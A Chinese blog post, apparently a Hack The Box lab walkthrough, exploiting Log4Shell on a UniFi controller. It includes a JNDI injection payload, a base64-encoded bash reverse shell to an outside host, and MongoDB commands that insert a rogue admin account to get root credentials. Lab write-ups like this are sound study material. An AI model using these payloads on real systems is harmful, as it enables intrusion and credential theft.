hackthebox-01startpoint-TIER2-Unified

于 2023-02-07 11:04:21 发布
阅读量160 收藏 1
点赞数
分类专栏: hackthebox 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lalalaze/article/details/128915170
版权

389:LDAP服务

{"username":"admin","password":"admin","remember":"${jndi:ldap://10.10.16.41/whatever}","strict":true}

首先先安装jdk,之后再使用sudo apt-get install maven命令安装mvn

安装mvn是用于编译rogue-jndi

什么是rogue-jndi?

rogue-jndi会开启一个本地的LDAP服务器,允许我们接收来自有漏洞的服务器的连接并执行恶意代码

安装rogue-jndi工具并编译

git clone https://github.com/veracode-research/rogue-jndi

cd rogue-jndi

mvn package

出现build success即编译成功

这时target目录下就有了RogueJndi-1.1.jar,也是我们进行漏洞利用时会用到的程序

在使用RogueJndi-1.1.jar前先看看它支持哪些参数

为了数据再传输过程中不丢失,我们对反弹shell命令进行base64编码

echo 'bash -c bash -i >&/dev/tcp/10.10.16.60/4455 0>&1' | base64

接下来使用RogueJndi-1.1.jar并监听4444端口

我们可以利用tomcat,修改之前的payload,将修改好后的payload放入remember字段,发送

接着升级为交互式shell,以方便的进行下一步

script /dev/null -c bash

见 https://erikdekker.net/ubiquity/unifi/2020/05/09/reset-unifi-password.html

知道了用户名后,我们可以通过终端连接进数据库

mongo --port 27117 ace

经过上面两个题目,我们大概能猜出来后面的思路是更新最高权限用户的密码,然后进到unifi的后台看看。

在添加用户之前,我们先要生成自己的密码,使用以下命令生成,记得最后是密码,自己更换为自己的。

mkpasswd -m sha-512 pilgrim

$6$.Iuf3FgnlzBrydZc$UY.FcqQ24YVylXjYXW5io2imJdQtMqVdflzdrnWZWZIYvTMhUYsRsXuh4DipothRUooxMfVKDVohipIowim0c.

db.admin.insert({ "email" : "pilgrim@localhost.local", "last_site_name" : "default", "name" : "unifi-admin", "time_created" : NumberLong(100019800), "x_shadow" : "$6$.Iuf3FgnlzBrydZc$UY.FcqQ24YVylXjYXW5io2imJdQtMqVdflzdrnWZWZIYvTMhUYsRsXuh4DipothRUooxMfVKDVohipIowim0c." })

接着查找所以用户,然后获取到刚才添加的用户的objectid。

db.admin.find().forEach(printjson);

查看一下网站的用户的详细信息

db.site.find().forEach(printjson);

将我们插入的用户绑定到这个网站上去

db.privilege.insert({ "unifi-admin" : "623f071e1ab0487109299461", "permissions" : [ ], "role" : "admin", "61ce269d46e0fb0012d47ec4" : "61ce269d46e0fb0012d47ec4" });

在页面登录:账号:unifi-admin 密码:pilgrim

在setting中能知道root的密码如下:

NotACrackablePassword4U2022

SSH连接

:)--+
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CSWAnimatedImageViewExample
04-27
CSWAnimatedImageViewExample 将图像显示为动画的颜色渐变的图像视图 截屏 苹果手机 安装 当前,集成CSWAnimatedImageView的方法是将CSWAnimatedTextView.m和CSWAnimatedTextView.h添加到您的项目中。 如何开始 在Interface Builder中添加一个UIView,然后在身份检查器中将View的Custom类设置为CSWAnimatedTextView。 有九个键值编码值定义为用户定义的运行时属性(UDRA)。 如果未定义UDRA,则存在硬编码的默认值。 colorOuter-渐变的开始和结束颜色colorInner-渐变持续时间的中间颜色-动画循环长度反转-动画反转方向imageName-视图中图像的名称startPoint-渐变的起点EndPoint-渐变的终点 可以使用Interface Bui
JNDIExploit:用于JNDI注入攻击的恶意LDAP服务器
03-19
JNDI漏洞利用 一款用作JNDI注入利用的工具,大量参考/引用了Rogue JNDI项目的代码,支持直接插入植入内存shell ,并集成了常见的bypass 高版本JDK的方式,适用于与自动化工具配合使用。 使用说明 使用java -jar JNDIExploit.jar -h查看参数说明,其中--ip参数为必选参数 Usage: java -jar JNDIExploit.jar [options] Options: * -i, --ip Local ip address -l, --ldapPort Ldap bind port (default: 1389) -p, --httpPort Http bind port (default: 8080) -u, --usage Show usage (default: false)
node-geo-point
05-15
GeoPoint 安装 $ npm install geo-point 建设者 new GeoPoint(latitude: Number, longitude: Number) 实例方法 calculateBearing(point: GeoPoint): Number 计算到目标点的方位角(以度为单位)。 const startPoint = new GeoPoint ( 51.5 , - 0.15 ) ; const endPoint = new GeoPoint ( 52.5 , - 1.15 ) ; const bearing = startPoint . calculateBearing ( endPoint ) ; calculateDestination(distance: Number, bearing: Number): GeoPoint 使用起点,方位角和坐
Tomcat中JNDI原理
05-10
简单我tomcat5.0中的JNDI应用
JNDI本地加载
我是谁
07-04 870
测试时,如果不想启动服务器,但是需要使用上下文环境, private static void initJndi(){ try { System.setProperty(Context.INITIAL_CONTEXT_FACTORY, "org.apache.naming.java.javaURLContextFactory"); System.setProperty(Context.URL
JNDI注入辅助工具
打工人日记
01-26 9872
简介 一、Rogue JNDI 简介 用于JNDI注入攻击的恶意LDAP服务器。 项目地址:https://github.com/veracode-research/rogue-jndi 该项目包含LDAP和HTTP服务器,用于利用默认情况下不安全的Java JNDI API。 为了进行攻击,您可以在本地启动这些服务器,然后在易受攻击的客户端上触发JNDI解析,例如: InitialContext.doLookup("ldap://your_server.com:1389/o=reference"); 它
hackthebox-01startpoint-TIER0-Synced
lalalaze的博客
02-06 121
打靶
Hack The Box Starting Point 渗透测试入门靶场 TIER 2 - Unified
Start C的博客
05-18 1188
本次探讨在一个非常著名的网络设备监控系统“UniFi”中利用 Log4J 的效果。这台靶机展示了如何设置和安装必要的软件包和工具,以通过滥用 Log4J 漏洞利用 UniFi 并操纵名为 remember 的 POST 标头,为您提供机器上的反向 shell。您还将通过更改系统上运行的 MongoDB 实例中保存的哈希值来更改管理员密码,这将允许访问管理面板并导致管理员的 SSH 密码泄露。 涉及内容:UniFi、CVE检索、Log4J、JNDI、LDAP、MongoDB、提权、SSH 废话不多说,开扫:
Hack the box -- 靶机渗透测试(TIER2
wjishuxiaobai的博客
06-25 1602
本文针对Hack the box 靶机TIER2渗透过程进行记录。开启在线靶机,靶机IP为10.129.88.20。端口扫描 扫描命令 sudo nmap -sC -sV 10.129.88.20, 发现1443端口开启了smb服务,所以尝试使用smbclient连接。smbclient连接 命令为:smbclient -N -L 10.129.88.20(-N表示无密码登录,-L可以查看服务器上可用服务) 通过查找发现在backups目录下存在一个配置文件prod.dtsConfig,将其下载本地进
rogue-jndi:用于JNDI注入攻击的恶意LDAP服务器
05-04
流氓JNDI 用于JNDI注入攻击的恶意LDAP服务器。 描述 该项目包含LDAP和HTTP服务器,用于利用默认情况下不安全的Java JNDI API。 为了执行攻击,您可以在本地启动这些服务器,然后在易受攻击的客户端上触发JNDI解析,例如: InitialContext . doLookup( " ldap://your_server.com:1389/o=reference " ); 它将启动从易受攻击的客户端到本地LDAP服务器的连接。 然后,本地服务器使用包含有效载荷之一的恶意条目进行响应,这对于实现远程代码执行很有用。 动机 除了已知的JNDI攻击方法(通过引用中的远程类加载)之外,此工具还利用的功能带来了新的攻击媒介。 支持的有效载荷 经典的JNDI攻击,通过远程类加载导致RCE,可达到jdk8u191 通过org.apache.naming.factory.Bea
generator-baukasten:太棒了!
02-05
包卡斯滕 baukasten made with love & help. --------------------------------------- Author : David Hellmann Website : ...Baukasten”或样板。 WordPress也已加入,但没有其他优先级。 大多数
高分项目,基于Unity3D开发实现的X-WeaponTrail 1.4.3 游戏,内含完整源码+资源+unitypackage
最新发布
06-11
高分项目,基于Unity3D开发实现的X-... 该插件的用法很简单,找到你的武器,把X-WeaponTrail预设拖到武器节点下,调整StartPoint和EndPoint,使其和武器对齐即可。 image image image 查看X Weapon Trail脚本,参数都比较...
PyPI 官网下载 | startpoint-1.3.1.tar.gz
01-16
资源来自pypi官网。 资源全名:startpoint-1.3.1.tar.gz
startpoint是一个身份系统提供用户树形结构组token等API。
08-08
startpoint是一个身份系统,提供用户、树形结构组、token等API。
利用CodeSec代码审核平台深度扫描Log4j2漏洞
技术杂谈
02-09 749
Log4j2 安全漏洞(编号 CVE-2021-44228)事件已经过去一个多月了,但它造成的危害影响却非常严重,各大软件安全厂商在第一时间针对此漏洞紧急做了补丁。 虽然漏洞最早是由阿里发现的,但实际上它是一个0day漏洞,这就意味着早在国内发现它之前,国外可能利用该漏洞已经有一段时间了。 Log4j2 漏洞也许早就被发现了 想发现这个安全漏洞其实并不难,使用常规的挖洞工具、SAST(静态应用安全测试)工具、SCA(软件成分分析)工具都能挖掘出来,但为什么一直没有引起重视或暴露出来呢? 事实上,可能很多 h
HackTheBox - Unified
qq_45862635的博客
06-18 1298
Hack The Box :: Starting Point - Tier2 - Unified
HTB-Unified
weixin_51392885的博客
11-14 873
HTB 内网渗透
log4j2史诗级漏洞攻击重现
12-10 7012
log4j2远程执行命令漏洞
log4j2漏洞复现
yangyangrenren的专栏
12-17 1090
1、本地启动ldap服务 https://github.com/veracode-research/rogue-jndi 下载这个链接的源码进行编译 mvn package -DskipTests 启动命令: #这里172.19.60.23是我本地的ip java -jar target/RogueJndi-1.1.jar -c "calc" -n 172.19.60.23 说明:原作者这里使用过的是 calc,应该是在windows系统上实验的。在ubuntu以及mac上,使用calc是不行的。在ma
Point startPoint = new Point(width/2, height-50)
03-29
The Point object is initialized with the x-coordinate as the center of the canvas (width/2) and the y-coordinate as 50 pixels from the bottom of the canvas (height-50). In other words, this code ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值